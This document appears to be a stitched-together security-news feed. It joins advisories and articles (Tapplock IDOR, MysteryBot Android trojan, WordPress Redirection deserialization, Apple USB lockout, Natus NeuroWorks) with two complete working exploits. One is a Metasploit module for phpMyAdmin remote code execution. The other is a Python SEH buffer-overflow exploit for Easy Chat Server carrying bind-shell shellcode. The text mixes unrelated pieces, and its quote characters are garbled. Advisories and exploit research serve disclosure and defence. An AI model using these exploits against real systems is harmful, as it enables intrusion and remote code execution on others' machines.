phpMyAdmin 4.x Remote Code Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘phpMyAdmin Authenticated Remote Code Execution’,
‘Description’ => %q{
phpMyAdmin 4.0.x before 4.0.10.16, 4.4.x before 4.4.15.7, and 4.6.x before
4.6.3 does not properly choose delimiters to prevent use of the preg_replace
(aka eval) modifier, which might allow remote attackers to execute arbitrary
PHP code via a crafted string, as demonstrated by the table search-and-replace
implementation.
},
‘Author’ =>
[
‘Michal AihaA and Cure53’, # Discovery
‘Matteo Cantoni <goony[at]nothink.org>’ # Metasploit Module
],
‘License’ => MSF_LICENSE,
‘References’ =>
[
[ ‘BID’, ‘91387’ ],
[ ‘CVE’, ‘2016-5734’ ],
[ ‘CWE’, ‘661’ ],
[ ‘URL’, ‘https://www.phpmyadmin.net/security/PMASA-2016-27/’ ],
[ ‘URL’, ‘https://security.gentoo.org/glsa/201701-32’ ],
[ ‘URL’, ‘https://www.exploit-db.com/exploits/40185/’ ],
],
‘Privileged’ => true,
‘Platform’ => [ ‘php’ ],
‘Arch’ => ARCH_PHP,
‘Payload’ =>
{
‘BadChars’ => “&\n=+%”,
},
‘Targets’ =>
[
[ ‘Automatic’, {} ]
],
‘DefaultTarget’ => 0,
‘DisclosureDate’ => ‘Jun 23 2016’))

register_options(
[
OptString.new(‘TARGETURI’, [ true, “Base phpMyAdmin directory path”, ‘/phpmyadmin/’]),
OptString.new(‘USERNAME’, [ true, “Username to authenticate with”, ‘root’]),
OptString.new(‘PASSWORD’, [ false, “Password to authenticate with”, ”]),
OptString.new(‘DATABASE’, [ true, “Existing database at a server”, ‘phpmyadmin’])
])
end

def check
begin
res = send_request_cgi({ ‘uri’ => normalize_uri(target_uri.path, ‘/js/messages.php’) })
rescue
print_error(“#{peer} – Unable to connect to server”)
return Exploit::CheckCode::Unknown
end

if res.nil? || res.code != 200
print_error(“#{peer} – Unable to query /js/messages.php”)
return Exploit::CheckCode::Unknown
end

# PHP 4.3.0-5.4.6
# PHP > 5.4.6 not exploitable because null byte in regexp warning
php_version = res[‘X-Powered-By’]
if php_version
vprint_status(“#{peer} – PHP version: #{php_version}”)

if php_version =~ /PHP\/(\d+\.\d+\.\d+)/
version = Gem::Version.new($1)
vprint_status(“#{peer} – PHP version: #{version.to_s}”)
if version > Gem::Version.new(‘5.4.6’)
return Exploit::CheckCode::Safe
end
end
else
vprint_status(“#{peer} – Unknown PHP version”)
end

# 4.3.0 – 4.6.2 authorized user RCE exploit
if res.body =~ /pmaversion = ‘(\d+\.\d+\.\d+)’;/
version = Gem::Version.new($1)
vprint_status(“#{peer} – phpMyAdmin version: #{version.to_s}”)

if version >= Gem::Version.new(‘4.3.0’) and version <= Gem::Version.new(‘4.6.2’)
return Exploit::CheckCode::Appears
elsif version < Gem::Version.new(‘4.3.0’)
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end

return Exploit::CheckCode::Unknown
end

def exploit
return unless check == Exploit::CheckCode::Appears

uri = target_uri.path
vprint_status(“#{peer} – Grabbing CSRF token…”)

response = send_request_cgi({ ‘uri’ => uri})

if response.nil?
fail_with(Failure::NotFound, “#{peer} – Failed to retrieve webpage grabbing CSRF token”)
elsif (response.body !~ /”token”\s*value=”([^”]*)”/)
fail_with(Failure::NotFound, “#{peer} – Couldn’t find token. Is URI set correctly?”)
end

token = $1
vprint_status(“#{peer} – Retrieved token #{token}”)

vprint_status(“#{peer} – Authenticating…”)
login = send_request_cgi({
‘method’ => ‘POST’,
‘uri’ => normalize_uri(uri, ‘index.php’),
‘vars_post’ => {
‘token’ => token,
‘pma_username’ => datastore[‘USERNAME’],
‘pma_password’ => datastore[‘PASSWORD’]
}
})

if login.nil?
fail_with(Failure::NotFound, “#{peer} – Failed to retrieve webpage”)
elsif login.redirect?
token = login.redirection.to_s.scan(/token=(.*)[&|$]/).flatten.first
else
fail_with(Failure::NotFound, “#{peer} – Couldn’t find token. Wrong phpMyAdmin version?”)
end

cookies = login.get_cookies

login_check = send_request_cgi({
‘uri’ => normalize_uri(uri, ‘index.php’),
‘vars_get’ => { ‘token’ => token },
‘cookie’ => cookies
})

if login_check.nil?
fail_with(Failure::NotFound, “#{peer} – Failed to retrieve webpage”)
elsif login_check.body =~ /Welcome to/
fail_with(Failure::NoAccess, “#{peer} – Authentication failed”)
end

vprint_status(“#{peer} – Authentication successful”)

# Create random table and column
rand_table = Rex::Text.rand_text_alpha_lower(3+rand(3))
rand_column = Rex::Text.rand_text_alpha_lower(3+rand(3))
sql_value = ‘0%2Fe%00’

vprint_status(“#{peer} – Create random table ‘#{rand_table}’ into ‘#{datastore[‘DATABASE’]}’ database…”);

create_rand_table = send_request_cgi({
‘uri’ => normalize_uri(uri, ‘import.php’),
‘method’ => ‘POST’,
‘cookie’ => cookies,
‘encode_params’ => false,
‘vars_post’ => {
‘show_query’ => ‘0’,
‘ajax_request’ => ‘true’,
‘db’ => datastore[‘DATABASE’],
‘pos’ => ‘0’,
‘is_js_confirmed’ => ‘0’,
‘fk_checks’ => ‘0’,
‘sql_delimiter’ => ‘;’,
‘token’ => token,
‘SQL’ => ‘Go’,
‘ajax_page_request’ => ‘true’,
‘sql_query’ => “CREATE+TABLE+`#{rand_table}`+( ++++++`#{rand_column}`+varchar(10)+CHARACTER+SET”\
“+utf8+NOT+NULL ++++)+ENGINE=InnoDB+DEFAULT+CHARSET=latin1; ++++INSERT+INTO+`#{rand_table}`+”\
“(`#{rand_column}`)+VALUES+(‘#{sql_value}’); ++++”,
}
})

if create_rand_table.nil? || create_rand_table.body =~ /(.*)<code>\\n(.*)\\n<\\\/code>(.*)/i
fail_with(Failure::Unknown, “#{peer} – Failed to create a random table”)
end

vprint_status(“#{peer} – Random table created”)

# Execute command
command = Rex::Text.uri_encode(payload.encoded)

exec_cmd = send_request_cgi({
‘uri’ => normalize_uri(uri, ‘tbl_find_replace.php’),
‘method’ => ‘POST’,
‘cookie’ => cookies,
‘encode_params’ => false,
‘vars_post’ =>{
‘columnIndex’ => ‘0’,
‘token’ => token,
‘submit’ => ‘Go’,
‘ajax_request’ => ‘true’,
‘goto’ => ‘sql.php’,
‘table’ => rand_table,
‘replaceWith’ => “eval%28%22#{command}%22%29%3B”,
‘db’ => datastore[‘DATABASE’],
‘find’ => sql_value,
‘useRegex’ => ‘on’
}
})

# Remove random table
vprint_status(“#{peer} – Remove the random table ‘#{rand_table}’ from ‘#{datastore[‘DATABASE’]}’ database”)

rm_table = send_request_cgi({
‘uri’ => normalize_uri(uri, ‘import.php’),
‘method’ => ‘POST’,
‘cookie’ => cookies,
‘encode_params’ => false,
‘vars_post’ => {
‘show_query’ => ‘0’,
‘ajax_request’ => ‘true’,
‘db’ => datastore[‘DATABASE’],
‘pos’ => ‘0’,
‘is_js_confirmed’ => ‘0’,
‘fk_checks’ => ‘0’,
‘sql_delimiter’ => ‘;’,
‘token’ => token,
‘SQL’ => ‘Go’,
‘ajax_page_request’ => ‘true’,
‘sql_query’ => “DROP+TABLE+`#{rand_table}`”
}
})

if rm_table.nil? || rm_table.body !~ /(.*)MySQL returned an empty result set \(i.e. zero rows\).(.*)/i
print_bad(“#{peer} – Failed to remove the table ‘#{rand_table}'”)
end
end
end

Tapplock Smart Lock Insecure Direct Object Reference

The server http://api.tapplock.com/ which servers as the api server for the tapplock smart lock is vulnerable to multiple authorization bypasses allowing horizontal escalation of privileges which could lead to the disclosure of all the info of all users and total compromise of every lock. The attacker could gain access to any lock, and retrieve PII (email and street address) of any user.
There is a full write up available at : https://medium.com/@evstykas/totally-pwning-the-tapplock-smart-lock-the-api-way-c8d89915f025 <https://medium.com/@evstykas/totally-pwning-the-tapplock-smart-lock-the-api-way-c8d89915f025>

Details

Attack Vector: HTTP GET
Prerequisites: Authentication (Authorization Header)
CWE: Insecure Direct Object References, Authorization bypass through user-controlled key
Technical Impact: Horizontal escalation of privilege (one user can view/modify information of all accounts)
Vulnerable query URLs:
http://api.tapplock.com/api/v1/locks/{email}?myOwner=0&page=1&size=10
http://api.tapplock.com/api/v1/shareable_users/{email}?page=1&size=10
http://api.tapplock.com/api/v1/shares/{email}?page=1&size=10
Vulnerable parameter: email

Attack Vector: HTTP GET
Prerequisites: Authentication (Authorization Header)
CWE: Insecure Direct Object References, Authorization bypass through user-controlled key
Technical Impact: Horizontal escalation of privilege (one user can view/modify information of all accounts)
Vulnerable query URLs:
http://api.tapplock.com/api/v1/locks/{email}?myOwner=0&page=1&size=10
http://api.tapplock.com/api/v1/shareable_users/{email}?page=1&size=10
http://api.tapplock.com/api/v1/shares/{email}?page=1&size=10
Vulnerable parameter: email

Attack Vector: HTTP GET
Prerequisites: Authentication (Authorization Header)
CWE: Insecure Direct Object References, Authorization bypass through user-controlled key
Technical Impact: Horizontal escalation of privilege (one user can view/modify information of all accounts)
Vulnerable query URLs:
http://api.tapplock.com/api/v1/finger_owners/{userUuid}?page=1&size=10
http://api.tapplock.com/api/v1/unlock_records/bluetooth/{userUuid}?page=1&size=10
http://api.tapplock.com/api/v1/finger_owners/{userUuid}?page=1&size=10
Vulnerable parameter: userUuid

Attack Vector: HTTP POST
Prerequisites: Authentication (Authorization Header)
CWE: Insecure Direct Object References, Authorization bypass through user-controlled key
Technical Impact: Horizontal escalation of privilege (one user can view/modify information of all accounts)
Vulnerable query URLs:
http://api.tapplock.com/api/v1/users
http://api.tapplock.com/api/v1/locks
http://api.tapplock.com/api/v1/shareable_users
http://api.tapplock.com/api/v1/shares
http://api.tapplock.com/api/v1/finger_owners
http://api.tapplock.com/api/v1/fingers
http://api.tapplock.com/api/v1/fingers/actions/check
http://api.tapplock.com/api/v1/unlock_records/bluetooth
Vulnerable parameter: All the parameters that are posted on the json payload are not checked.

Attack Vector: HTTP PATCH
Prerequisites: Authentication (Authorization Header)
CWE: Insecure Direct Object References, Authorization bypass through user-controlled key
Technical Impact: Horizontal escalation of privilege (one user can view/modify information of all accounts)
Vulnerable query URLs:
http://api.tapplock.com/api/v1/users
http://api.tapplock.com/api/v1/locks
http://api.tapplock.com/api/v1/shareable_users
Vulnerable parameter: All the parameters that are posted on the json payload are not checked.

Attack Vector: HTTP DELETE
Prerequisites: Authentication (Authorization Header)
CWE: Insecure Direct Object References, Authorization bypass through user-controlled key
Technical Impact: Horizontal escalation of privilege (one user can view/modify information of all accounts)
Vulnerable query URLs:
http://api.tapplock.com/api/v1/locks/{lockId}
http://api.tapplock.com/api/v1/finger_owners/{uuid}
http://api.tapplock.com/api/v1/shareable_users/{shareableUserId}
http://api.tapplock.com/api/v1/shares/{shareId}
http://api.tapplock.com/api/v1/fingers/{fingerprintId}

Vulnerable parameter: All the parameters in {} are vulnerable.

New Banking Trojan Can Launch Overlay Attacks on Latest Android Versions

Researchers have discovered a new Android banking trojan that holds striking similarities to the infamous Lokibot – but packed with new tricky features, most notably its ability to implement an overlay attack on Android 7 and 8.

Researchers at ThreatFabric, who discovered the trojan, said MysteryBot was running on the same C&C server as the LokiBot Android banker discovered in 2017, suggesting that it’s either an update to the earlier malware or was developed by the same actor. The new trojan is still under development and is not widely spread, they said.

The bot comes with generic Android banking trojan functionalities – once a device is infected, for instance, the bad actor can use MysteryBot modules to make phone calls, scrape contact list info, copy keystrokes and encrypt files on external storage devices.

However, researchers said there’s much more to the story: “This bot has most generic Android banking trojan functionalities, but seems to be willing to surpass the average. The overlay, key-logging and ransomware functionalities are novel,” they said in a post. “Looking at the bot commands, we first thought that LokiBot had been improved. However, we quickly realized that there is more going on: the name of the bot and the name of the panel changed to ‘MysteryBot,’ [and] even the network communication changed.”

A ThreatFabric spokesperson told Threatpost that at the moment the trojan is spread via phishing while side-loading the payload. “The commonly fake Flash Player social-engineering trick is used in the distribution campaign,” said the spokesperson.

ThreatFabric discovered MysteryBot two weeks ago, and while researchers can’t say that it has been very active (less than 200 infections), they told us they believe that it will be properly spread once it is fully functional. 

One unique component to MysteryBot is its approach to overlay attacks, which enables attackers to draw on top of other apps running on the infected devices. This means they could overlay phishing pages on top of legitimate apps.

Android 7 and 8 have security protections like Security-Enhanced Linux (SELinux) built in, rendering previously used overlay techniques inaccessible, said researchers. These protections stop malware from showing off fake pages over apps. That has left malware families like ExoBot 2.5 and DiseaseBot searching for new overlay techniques – but MysteryBot appears to have found a solution.

Specifically, the bot abuses a glitch in the Android PACKAGE_USAGE_STATS service permission (a.k.a. the “Usage Access” permission), which is an Android software feature that shows stats revolving around usage of apps. Usually the victim has to provide specific permissions for usage – but MysteryBot employs AccessibilityService, which allows it to abuse any required permission without the victim’s consent. Android said that accessibility services are typically used to assist users with disabilities in using Android devices and apps.

Interestingly, it asks victims to grant Accessibility Service permissions after installing the malware.

“It seems that the reason for the victims to grant such permissions [is] the number of benign apps nowadays asking for exhaustive sets of permissions — making it common for users to grant permissions without reviewing the permissions requested,” the researchers said. “At the moment, MysteryBot is not using such an M.O. to get the Usage Access permission, but will ask the victim for it directly.”

The bot has abused this feature to target overlay attacks against over 100 apps, including WhatsApp and Facebook.

Other Features

The bot also appears to have innovated keylogging functionalities, effectively lowering detection rates and limiting the user interaction required to enable the logger.

While most trojans abuse the Android Accessibility Service to log the keystrokes or make screenshots upon key-presses, MysteryBot’s logging mechanism uses the Accessibility Service permission to do so directly after installing the malware.

The method essentially calculates the location for each row and places a “View” over each key. Each “view” is then paired to a specific key in such a way that it can register the keys that have been pressed which are then saved for further use, researchers said.

While this technique requires more user interaction (i.e., asking for Accessibility Service permission) to be successful, it also has potential to log more than the usual keystrokes.

“At the time of writing, the code for the keylogger seems to still be under development, as there is no method yet to send the logs to the C2 server,” researchers said.

Moving forward, the enhanced overlay attack capability can be used to run on the latest Android versions; this, combined with the advanced keylogging features, will enable MysteryBot “to harvest a broad set of personally identifiable information in order to perform fraud,” researchers said.

MysteryBot also packs a ransomware module, which includes a new capability that allows the trojan to encrypt all files individually in the external storage directory, including every sub directory. After that, the original files are deleted.

As part of this, the trojan can delete the contacts in the contact list of the infected device, something that researchers said was not observed in banking malware until now.

“In the last six months we observed that capabilities such as a proxy, keylogging, remote access (RAT), sound-recording and file-uploading have become more and more common; we suspect this trend to only grow in the future,” researchers said.  “If our expectation of increases in such behavior turns out to be true, it means that it will become difficult for financial institutions to assess whether or not they are targeted by the specific threats…all infected devices can be source of fraud and espionage.”

WordPress Redirection 2.7.1 Deserialization Code Execution

Details
================
Software: Redirection
Version: 2.7.1
Homepage: https://wordpress.org/plugins/redirection/
Advisory report: https://advisories.dxw.com/advisories/unserialization-redirection/
CVE: Awaiting assignment
CVSS: 9 (High; AV:N/AC:L/Au:S/C:C/I:C/A:C)

Description
================
Unserialization vulnerability in Redirection could allow admin to execute arbitrary code in some circumstances

Vulnerability
================
It is possible for a user with the administrator privilege to submit a string that contains an encoded object that executes arbitrary code of the attackeras choosing.
The value can be passed in with an AJAX request to admin-ajax.php using the red_ajax_set_redirect action that is passed to the ajax_set_redirect method in this code:
public function ajax_set_redirect( $params ) {
$params = $this->get_params( $params );
….
$result = $redirect->update( $params );
}

private function get_params( $params ) {
if ( empty( $params ) ) {
$params = $_POST;
}
return $params;
}

The update method then passes the attack string to this code:
class Red_Item {
public function update( $details ) {
$data = $sanitizer->get( $details );
$this->load_from_data( (object) $data );
}

private function load_from_data( stdClass $values ) {
foreach ( $values as $key => $value ) {
$this->$key = $value; }
}
The sanitizer does not sanitize the action_data value. Many calls to this class then use its to_json method, which is as follows:
public function get_action_data() {
return $this->action_data ? $this->action_data : \’\’;
}

public function to_json() {
maybe_unserialize( $this->get_action_data() ),
}

The sum effect is therefore that unsanitized user input is being passed to maybe_unserialize().

Proof of concept
================
Achieving arbitrary code execution depends on which classes are available (i.e. which plugins and themes are installed and active). It may not be possible in all situations. As such, this PoC will merely attempt to show that an arbitrary string can be passed to the maybe_unserialize() function.

Visit /wp-admin/tools.php?page=redirection.php
Create a new redirect with a/booa, ahttps://www.dxw.com/a, and aRedirectionsa.
Weall assume this redirect was given ID of 1 in the wp_redirection_items table. If that isnat true, change the aida value in the provided JavaScript.
Then, without leaving the page, open your browseras console and execute this JavaScript:
jQuery.ajax(ajaxurl,{
method: \’POST\’,
data: {
\’action\’: \’red_set_redirect\’,
\’_wpnonce\’: window.Redirectioni10n.WP_API_nonce,
\’id\’: \’1\’,
\’match_type\’: \’url\’,
\’action_code\’: \’1\’,
\’action_type\’: \’url\’,
\’url\’: \’https://www.dxw.com/\’,
\’group_id\’: \’1\’,
\’action_data\’: \’O:8:\”stdClass\”:1:{s:5:\”hello\”;s:5:\”world\”;}\’,
},
}).done(console.log)
Then, by inspecting the JavaScript object printed by console.log, or by looking at the Network logs, youall notice that we have a {ahelloa: aworlda} JavaScript object showing that our arbitrary string was passed to unserialize() and therefore, if the correct classes were available, we would be able to turn this into arbitrary code execution.

Mitigations
================
Upgrade to version 2.8 or later.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://advisories.dxw.com/disclosure/

Please contact us on [email protected] to acknowledge this report if you received it via a third party (for example, [email protected]) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2017-10-02: Discovered
2017-10-03: Reported via website contact form
2017-10-04: Response received. Author has asked for PoC: aThe value for action_data is sanitised when it is passed through Red_Item_Sanitizea
2017-10-09: Developed a PoC
2017-10-10: Working PoC provided to author.
2017-10-18: Author reported fixed in 2.8
2018-06-06: Advisory published
2018-06-12: CVE requested

Discovered by dxw:
================
Glyn Wintle
Please visit advisories.dxw.com for more information.

Easy Chat Server 3.1 Add User Local Buffer Overflow

#!/usr/bin/env python
#———————————————————————————————————-#
# Exploit Title : Easy Chat Server 3.1 – ‘Add user’ Local Buffer Overflow #
# Exploit Author : Hashim Jawad – @ihack4falafel #
# Vendor Homepage : http://www.echatserver.com/index.htm #
# Vulnerable Software: http://www.echatserver.com/ecssetup.exe #
# Tested on : Windows 7 Enterprise SP1 (x64) #
# Steps to reproduce : paste contents of Evil.txt in ‘Name:’ field under Add user and click OK #
#———————————————————————————————————-#

# msfvenom -p windows/shell_bind_tcp -b ‘\x00\x0a\x0d’ -e x86/alpha_mixed -f python -v shellcode
# Payload size: 718 bytes
shellcode = “”
shellcode += “\x89\xe3\xda\xd3\xd9\x73\xf4\x5e\x56\x59\x49\x49”
shellcode += “\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43”
shellcode += “\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30”
shellcode += “\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30”
shellcode += “\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49”
shellcode += “\x79\x6c\x6a\x48\x6b\x32\x53\x30\x73\x30\x77\x70”
shellcode += “\x43\x50\x4e\x69\x7a\x45\x36\x51\x79\x50\x61\x74”
shellcode += “\x4e\x6b\x52\x70\x76\x50\x6e\x6b\x62\x72\x44\x4c”
shellcode += “\x4c\x4b\x51\x42\x72\x34\x4c\x4b\x71\x62\x66\x48”
shellcode += “\x76\x6f\x4d\x67\x63\x7a\x45\x76\x50\x31\x4b\x4f”
shellcode += “\x6c\x6c\x65\x6c\x75\x31\x63\x4c\x77\x72\x44\x6c”
shellcode += “\x35\x70\x4a\x61\x68\x4f\x74\x4d\x63\x31\x5a\x67”
shellcode += “\x69\x72\x5a\x52\x76\x32\x46\x37\x6e\x6b\x52\x72”
shellcode += “\x44\x50\x6e\x6b\x30\x4a\x75\x6c\x6e\x6b\x62\x6c”
shellcode += “\x66\x71\x73\x48\x68\x63\x77\x38\x67\x71\x58\x51”
shellcode += “\x66\x31\x6c\x4b\x31\x49\x31\x30\x46\x61\x59\x43”
shellcode += “\x6c\x4b\x37\x39\x56\x78\x7a\x43\x45\x6a\x50\x49”
shellcode += “\x4c\x4b\x74\x74\x6e\x6b\x53\x31\x6a\x76\x66\x51”
shellcode += “\x69\x6f\x6e\x4c\x59\x51\x4a\x6f\x44\x4d\x76\x61”
shellcode += “\x6a\x67\x64\x78\x6b\x50\x70\x75\x4a\x56\x44\x43”
shellcode += “\x63\x4d\x48\x78\x77\x4b\x51\x6d\x67\x54\x52\x55”
shellcode += “\x59\x74\x70\x58\x4e\x6b\x66\x38\x65\x74\x55\x51”
shellcode += “\x68\x53\x63\x56\x6e\x6b\x56\x6c\x70\x4b\x4e\x6b”
shellcode += “\x52\x78\x45\x4c\x35\x51\x38\x53\x6c\x4b\x56\x64”
shellcode += “\x6c\x4b\x67\x71\x4a\x70\x6f\x79\x73\x74\x71\x34”
shellcode += “\x45\x74\x73\x6b\x43\x6b\x31\x71\x73\x69\x51\x4a”
shellcode += “\x70\x51\x59\x6f\x4d\x30\x51\x4f\x73\x6f\x33\x6a”
shellcode += “\x4e\x6b\x36\x72\x58\x6b\x6c\x4d\x33\x6d\x31\x78”
shellcode += “\x70\x33\x57\x42\x47\x70\x43\x30\x35\x38\x30\x77”
shellcode += “\x33\x43\x46\x52\x53\x6f\x36\x34\x61\x78\x42\x6c”
shellcode += “\x63\x47\x54\x66\x36\x67\x59\x6f\x58\x55\x6d\x68”
shellcode += “\x4e\x70\x53\x31\x55\x50\x77\x70\x35\x79\x7a\x64”
shellcode += “\x50\x54\x30\x50\x65\x38\x55\x79\x6b\x30\x62\x4b”
shellcode += “\x53\x30\x39\x6f\x5a\x75\x43\x5a\x33\x38\x66\x39”
shellcode += “\x52\x70\x79\x72\x59\x6d\x51\x50\x76\x30\x51\x50”
shellcode += “\x66\x30\x35\x38\x79\x7a\x66\x6f\x69\x4f\x59\x70”
shellcode += “\x39\x6f\x79\x45\x6f\x67\x35\x38\x66\x62\x63\x30”
shellcode += “\x54\x51\x71\x4c\x4d\x59\x49\x76\x52\x4a\x56\x70”
shellcode += “\x66\x36\x76\x37\x33\x58\x78\x42\x6b\x6b\x56\x57”
shellcode += “\x55\x37\x69\x6f\x79\x45\x31\x47\x33\x58\x68\x37”
shellcode += “\x79\x79\x34\x78\x4b\x4f\x4b\x4f\x49\x45\x46\x37”
shellcode += “\x35\x38\x61\x64\x38\x6c\x57\x4b\x69\x71\x69\x6f”
shellcode += “\x4b\x65\x42\x77\x4f\x67\x33\x58\x44\x35\x32\x4e”
shellcode += “\x32\x6d\x55\x31\x59\x6f\x78\x55\x65\x38\x30\x63”
shellcode += “\x52\x4d\x42\x44\x57\x70\x4b\x39\x79\x73\x63\x67”
shellcode += “\x33\x67\x30\x57\x36\x51\x59\x66\x73\x5a\x46\x72”
shellcode += “\x43\x69\x50\x56\x49\x72\x79\x6d\x51\x76\x58\x47”
shellcode += “\x33\x74\x67\x54\x47\x4c\x76\x61\x66\x61\x4c\x4d”
shellcode += “\x57\x34\x54\x64\x62\x30\x78\x46\x77\x70\x33\x74”
shellcode += “\x70\x54\x42\x70\x70\x56\x73\x66\x30\x56\x42\x66”
shellcode += “\x32\x76\x50\x4e\x61\x46\x63\x66\x52\x73\x42\x76”
shellcode += “\x61\x78\x63\x49\x78\x4c\x75\x6f\x4e\x66\x6b\x4f”
shellcode += “\x4e\x35\x4f\x79\x69\x70\x52\x6e\x70\x56\x43\x76”
shellcode += “\x69\x6f\x64\x70\x35\x38\x75\x58\x6b\x37\x45\x4d”
shellcode += “\x33\x50\x69\x6f\x5a\x75\x6f\x4b\x7a\x50\x58\x35”
shellcode += “\x6d\x72\x33\x66\x71\x78\x6d\x76\x6f\x65\x4f\x4d”
shellcode += “\x6d\x4d\x69\x6f\x4b\x65\x35\x6c\x35\x56\x73\x4c”
shellcode += “\x64\x4a\x6d\x50\x6b\x4b\x69\x70\x70\x75\x67\x75”
shellcode += “\x6d\x6b\x77\x37\x36\x73\x42\x52\x32\x4f\x51\x7a”
shellcode += “\x77\x70\x32\x73\x39\x6f\x6b\x65\x41\x41”

buffer = ‘\xcc’ * 217 # offset to nSEH
buffer += ‘\x75\x06\x74\x06’ # nSEH | jump net
buffer += ‘\x21\x7f\x01\x10’ # SEH | 0x10017f21 : pop esi # pop ecx # ret | [SSLEAY32.dll]
buffer += ‘\x90’ * 10 # nop sled
buffer += shellcode # bind shell
buffer += ‘\xcc’ * (5000-217-4-4-10-len(shellcode)) # junk

try:
f=open(“Evil.txt”,”w”)
print “[+] Creating %s bytes evil payload..” %len(buffer)
f.write(buffer)
f.close()
print “[+] File created!”
except Exception as e:
print e

Apple Removes iPhone USB Access Feature, Blocking Out Hackers, Law Enforcement

Apple said an upcoming iOS software update will remove the infamous iPhone USB access feature, blocking out both hackers – and law enforcement – from accessing a locked phones’ data via the device port.

Apple confirmed that new upcoming default settings will disable the iPhone’s Lightning port, its charging and data port, an hour after the iPhone has been unlocked.

“At Apple, we put the customer at the center of everything we design,” an Apple spokesperson told Threatpost in an email. “We’re constantly strengthening the security protections in every Apple product to help customers defend against hackers, identity thieves and intrusions into their personal data.”

This means that users can still charge their phones, but will not be able to continue to transfer data to and from their device until they enter the passcode.

The move blocks off several devices (some of which have been used by federal law enforcement agencies) that have been designed to hack into iPhones via the Lightning port.

One such device, called the GrayKey box, has been known to unlock iPhones using the Lightning port to install software that cracks the passcode of an iOS device. Reports have found that several federal agencies – such as the FBI – have used the device, made by a company called Grayshift, to unlock up-to-date iPhones.

The move may also protect against Cellebrite’s UFED devices, forensic tools for iPhones and iPads that can reportedly unlock iOS devices.

“The fact is that this method of access presents a vulnerability, and Apple has made a calculated decision that they’ll see a better return on fixing that vulnerability than continuing to allow it to be exploited,” Tim Erlin, VP product management and strategy at Tripwire, said in an email to Threatpost.

In beta versions of iOS 11.4, Apple had first introduced a rudimentary version of the feature called USB Restricted Mode. This feature disabled USB access to the Lightning Connector after seven days.

In the case of USB Restricted Mode, the Apple spokesperson told Threatpost the company  learned that possible vulnerabilities exist in how iOS handles USB devices, and thus commenced a thorough review of the code, improving the security of many pieces of the USB stack.

The Apple spokesperson said additional mitigation was added which would remove the USB as an attack surface when customers don’t need it, without negatively impacting the user experience.

Apple told Reuters it will be permanently available in a forthcoming OS release.

Apple’s Rocky Past With FBI

Apple has had a long bumpy history with federal law enforcement when it comes to unlocking iPhones.

That conflict escalated in 2016, when Apple refused to comply with an FBI request to unlock the iPhone of the San Bernardino gunman who killed 14 people in 2015.

Apple CEO Tim Cook at the time said in an open letter: “Building a version of iOS that bypasses security in this way would undeniably create a backdoor. And while the government may argue that its use would be limited to this case, there is no way to guarantee such control.”

When it comes to the new USB security measure, meanwhile, Apple said in a statement to Reuters that the move is directed toward hackers and bad actors instead of law enforcement.

“We have the greatest respect for law enforcement, and we don’t design our security improvements to frustrate their efforts to do their jobs,” the Apple spokesperson told Threatpost in an email.

Despite Apple’s assurances, the move may continue to sour the relationship between the phone giant and the government, experts say.

“This move shows that Apple is putting the consumer’s privacy first, at least in this instance,” Troy Kent, threat researcher at  Awake Security,  told Threatpost. “It’s better for the general consumer and also likely for organizations. Will it sour the relationship between Apple and the law enforcement in the future?  I’m sure.  But that doesn’t mean there won’t be another exploit out sometime soon that doesn’t require a USB connection.”

Erlin, for his part, said that law enforcement in the U.S. will certainly be impacted by this most recent move by Apple.

“This isn’t the first time that we’ve seen tension between Apple and law enforcement,” Erlin told Threatpost. “While Apple’s position is that addressing this vulnerability is for the benefit of customers in countries where there are fewer legal protections around seizing devices, there’s no doubt that it will impact law enforcement in the United States as well.”

Natus Xltek NeuroWorks

1. EXECUTIVE SUMMARY

  • CVSS v3 10.0

  • ATTENTION: Exploitable remotely/low skill level to exploit
  • Vendor: Natus Medical, Inc. (Natus)
  • Equipment: Natus Xltek NeuroWorks software
  • Vulnerabilities: Stack-Based Buffer Overflow, Out-of-Bounds Read

2. RISK EVALUATION

Successful exploitation of these vulnerabilities require access to the Natus customer network, and could crash the device being accessed; a buffer overflow condition may allow remote code execution.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following version of Natus Xltek NeuroWorks, used in Natus Xltek EEG medical products, are affected:

  • Natus Xltek NeuroWorks Version 8

3.2 VULNERABILITY OVERVIEW

3.2.1    OUT-OF-BOUNDS READ CWE-125

A specially-crafted packet may be able to cause an out-of-bounds read, which may result in a denial-of-service condition.

CVE-2017-2852 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

3.2.2    STACK-BASED BUFFER OVERFLOW CWE-121

An attacker may cause a buffer overflow by sending a specially-crafted packet to the affected product while the product attempts to open a file requested by the client.

CVE-2017-2853 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

3.2.3    OUT-OF-BOUNDS READ CWE-125

A specially-crafted packet may cause an out-of-bounds read, which may result in a denial-of-service condition.

CVE-2017-2858 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

3.2.4    OUT-OF-BOUNDS READ CWE-125

A specially-crafted packet may cause an out-of-bounds read, which may result in a denial-of-service condition.

CVE-2017-2860 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

3.2.5    OUT-OF-BOUNDS READ CWE-125

A specially-crafted packet may cause an out-of-bounds read, which may result in a denial-of-service condition.

CVE-2017-2861 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

